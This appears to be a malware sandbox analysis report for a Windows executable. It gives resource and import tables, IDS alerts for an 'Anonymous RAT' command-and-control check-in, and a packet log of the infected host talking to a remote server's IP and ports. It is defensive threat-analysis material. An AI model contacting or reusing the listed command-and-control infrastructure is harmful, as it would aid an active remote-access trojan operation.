RT_STRING | 0x47548 | 0x188 | data | English | United States | 0.4336734693877551
RT_STRING | 0x476d0 | 0x5fa | OpenPGP Public Key | English | United States | 0.3457516339869281
RT_STRING | 0x47ccc | 0x97c | data | English | United States | 0.2759472817133443
RT_STRING | 0x48648 | 0x3de | data | English | United States | 0.33636363636363636
RT_STRING | 0x48a28 | 0x114 | data | English | United States | 0.5652173913043478
RT_STRING | 0x48b3c | 0x3ba | data | English | United States | 0.34276729559748426
RT_STRING | 0x48ef8 | 0x9a | data | English | United States | 0.5844155844155844
RT_STRING | 0x48f94 | 0x216 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.46254681647940077
RT_STRING | 0x491ac | 0x624 | data | English | United States | 0.3575063613231552
RT_STRING | 0x497d0 | 0x660 | data | English | United States | 0.3474264705882353
RT_STRING | 0x49e30 | 0x2e2 | data | English | United States | 0.4037940379403794
RT_STRING | 0x4a114 | 0x6c | data | | | 0.6851851851851852
RT_STRING | 0x4a180 | 0x2d0 | data | | | 0.46111111111111114
RT_STRING | 0x4a450 | 0x250 | data | | | 0.49155405405405406
RT_STRING | 0x4a6a0 | 0x214 | data | | | 0.4567669172932331
RT_STRING | 0x4a8b4 | 0x180 | data | | | 0.5286458333333334
RT_STRING | 0x4aa34 | 0x1a4 | data | | | 0.5428571428571428
RT_STRING | 0x4abd8 | 0x3c0 | data | | | 0.3489583333333333
RT_STRING | 0x4af98 | 0x6a4 | data | | | 0.36
RT_STRING | 0x4b63c | 0x48c | data | | | 0.38230240549828176
RT_STRING | 0x4bac8 | 0x19c | data | | | 0.5145631067961165
RT_STRING | 0x4bc64 | 0xec | data | | | 0.597457627118644
RT_STRING | 0x4bd50 | 0x1a8 | data | | | 0.5
RT_STRING | 0x4bef8 | 0x2b8 | data | | | 0.4454022988505747
RT_STRING | 0x4c1b0 | 0x414 | data | | | 0.36398467432950193
RT_STRING | 0x4c5c4 | 0x3b4 | data | | | 0.37658227848101267
RT_STRING | 0x4c978 | 0x340 | data | | | 0.3762019230769231
RT_STRING | 0x4ccb8 | 0x354 | data | | | 0.35563380281690143
RT_STRING | 0x4d00c | 0x2d0 | data | | | 0.4513888888888889
RT_STRING | 0x4d2dc | 0xd8 | data | | | 0.5694444444444444
RT_STRING | 0x4d3b4 | 0xf0 | data | | | 0.55
RT_STRING | 0x4d4a4 | 0x350 | data | | | 0.4033018867924528
RT_STRING | 0x4d7f4 | 0x384 | data | | | 0.37444444444444447
RT_STRING | 0x4db78 | 0x2d8 | data | | | 0.375
RT_RCDATA | 0x4de50 | 0x10 | data | | | 1.5
RT_RCDATA | 0x4de60 | 0x590 | data | | | 0.6327247191011236
RT_RCDATA | 0x4e3f0 | 0x133db | Delphi compiled form 'TCreatePluginForm' | | | 0.09238558069305046
RT_RCDATA | 0x617cc | 0x2f1a | Delphi compiled form 'TdxBarCustomizingForm' | | | 0.25543207828827336
RT_RCDATA | 0x646e8 | 0x4b0 | Delphi compiled form 'TdxBarItemAddEditor' | | | 0.4608333333333333
RT_RCDATA | 0x64b98 | 0x287 | Delphi compiled form 'TdxBarNameEd' | | | 0.6058732612055642
RT_RCDATA | 0x64e20 | 0x171 | Delphi compiled form 'TdxBarSubMenuEditor' | | | 0.7100271002710027
RT_RCDATA | 0x64f94 | 0x1491 | Delphi compiled form 'TFindForm' | | | 0.2641975308641975
RT_RCDATA | 0x66428 | 0x49c | Delphi compiled form 'TfrmAddGroupItems' | | | 0.4610169491525424
RT_RCDATA | 0x668c4 | 0x1595 | Delphi compiled form 'THintForm' | | | 0.11782805429864253
RT_RCDATA | 0x67e5c | 0x1aaf | Delphi compiled form 'TInputStringForm' | | | 0.2577953447518665
RT_MESSAGETABLE | 0x6990c | 0x2840 | data | English | United States | 0.28823757763975155
RT_GROUP_CURSOR | 0x6c14c | 0x14 | data | | | 1.35
RT_GROUP_CURSOR | 0x6c160 | 0x14 | data | | | 1.3
RT_GROUP_CURSOR | 0x6c174 | 0x14 | data | | | 1.4
RT_GROUP_CURSOR | 0x6c188 | 0x14 | data | | | 1.4
RT_GROUP_CURSOR | 0x6c19c | 0x14 | data | | | 1.4
RT_GROUP_CURSOR | 0x6c1b0 | 0x14 | data | | | 1.4
RT_GROUP_CURSOR | 0x6c1c4 | 0x14 | data | | | 1.4
RT_GROUP_CURSOR | 0x6c1d8 | 0x14 | data | | | 1.4
RT_GROUP_CURSOR | 0x6c1ec | 0x14 | data | | | 1.4
                                                                          RT_GROUP_CURSOR0x6c2000x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2140x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2280x14data1.4
                                                                          RT_GROUP_CURSOR0x6c23c0x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2500x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2640x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2780x14data1.4
                                                                          RT_GROUP_CURSOR0x6c28c0x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2a00x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2b40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                          RT_GROUP_CURSOR0x6c2c80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                          RT_GROUP_CURSOR0x6c2dc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                          RT_GROUP_CURSOR0x6c2f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                          RT_GROUP_CURSOR0x6c3040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                          RT_GROUP_ICON0x6c3180x84data0.7045454545454546
                                                                          RT_VERSION0x6c39c0x3f4data0.475296442687747
                                                                          RT_VERSION0x6c7900x328dataEnglishUnited States0.44183168316831684
                                                                          RT_MANIFEST0x6cab80x244XML 1.0 document, ASCII text, with CRLF line terminatorsChineseChina0.453448275862069
DLL | Import
COMCTL32.dll | (no named imports listed)
KERNEL32.dll | GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
USER32.dll | CharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
GDI32.dll | GetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
SHELL32.dll | SHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
ole32.dll | CoInitialize, CreateStreamOnHGlobal, CoCreateInstance
OLEAUT32.dll | VariantClear, OleLoadPicture, SysAllocString
MSVCRT.dll | __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp
Language of compilation system | Country where language is spoken | Map
Chinese | China | (map image)
Russian | Russia | (map image)
English | United States | (map image)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T09:20:45.215284+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49782 | 118.107.44.112 | 18091 | TCP
2024-12-27T09:21:56.244401+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49793 | 118.107.44.112 | 18091 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 09:20:40.566216946 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:40.788098097 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:40.788182974 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.189259052 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.189297915 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.189307928 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.189372063 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.189407110 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.189418077 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.189434052 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.189446926 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.189455986 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.189466000 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.189589024 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.189599991 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.189610958 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.189631939 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.189660072 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.308998108 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.309019089 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.309073925 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.316713095 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.316766977 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.316812038 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.398927927 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.399063110 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.399202108 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.403153896 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.403270960 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.403331041 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.411572933 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.411708117 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.411752939 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.420077085 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.420315981 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.420352936 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.428349972 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.428386927 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.428633928 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.436707973 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.436830997 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.436882973 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.445146084 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.445250988 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.445292950 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.453563929 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.453645945 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.454128981 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.461687088 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.461766958 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.461808920 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.469732046 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.469851017 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.470006943 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.477858067 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.477952003 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.477998018 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.608738899 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.609003067 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.609114885 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.611247063 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.611414909 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.611460924 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.616404057 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.616470098 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.616513968 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.624129057 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.624142885 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.624193907 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.626651049 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.626754045 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.626800060 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.631752968 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.631871939 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.632046938 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.636928082 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.637053967 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.637106895 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.642066002 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.642153025 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.642199039 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.647170067 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.647286892 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.647351980 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.652335882 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.652385950 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.652791023 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.659775019 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.659787893 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.659832954 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.662545919 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.662616968 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.662668943 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.667656898 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.667762041 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.667805910 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.672856092 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.672905922 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.672982931 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.677938938 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.678102970 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.678739071 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.683206081 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.683269978 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.683722973 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.688256979 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.688365936 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.688405991 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.693429947 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.693511009 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.693556070 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.698440075 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.698512077 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.698571920 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.703547955 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.703668118 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.703707933 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.708657980 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.759439945 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.818087101 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.818136930 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.818191051 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.819272995 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.819386005 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.819432974 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.823137045 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.823252916 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.823302984 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.826982021 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.827131987 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.827217102 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.830847979 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.830959082 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.831053972 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.834714890 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.834820032 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.834876060 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.838490009 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.838604927 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.838656902 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.842263937 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.842354059 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.842418909 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.845982075 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.846079111 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.846128941 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.849739075 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.849837065 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.849888086 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.853554010 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.853672028 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.853715897 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:42.857207060 CET | 18852 | 49771 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:42.858139992 CET | 49771 | 18852 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:45.092263937 CET | 49782 | 18091 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:45.211817026 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:45.211910963 CET | 49782 | 18091 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:45.215284109 CET | 49782 | 18091 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:45.334721088 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:46.767575979 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:46.776797056 CET | 49782 | 18091 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:46.896344900 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:46.896385908 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:46.896436930 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:47.564888954 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:47.564954042 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:47.564987898 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:47.564996004 CET | 49782 | 18091 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:47.565068007 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:47.565114975 CET | 49782 | 18091 | 192.168.2.4 | 118.107.44.112
Dec 27, 2024 09:20:47.565129042 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:47.565175056 CET | 18091 | 49782 | 118.107.44.112 | 192.168.2.4
Dec 27, 2024 09:20:47.565216064 CET | 49782 | 18091 | 192.168.2.4 | 118.107.44.112
                                                                          Dec 27, 2024 09:20:47.565220118 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.565285921 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.565315008 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.565323114 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.565376043 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.565412998 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.573318005 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.618849039 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.684883118 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.728369951 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.776118040 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.776165009 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.776319027 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.780124903 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.780240059 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.780288935 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.788580894 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.788733959 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.788779020 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.796619892 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.796730042 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.796772957 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.805018902 CET1809149782118.107.44.112192.168.2.4
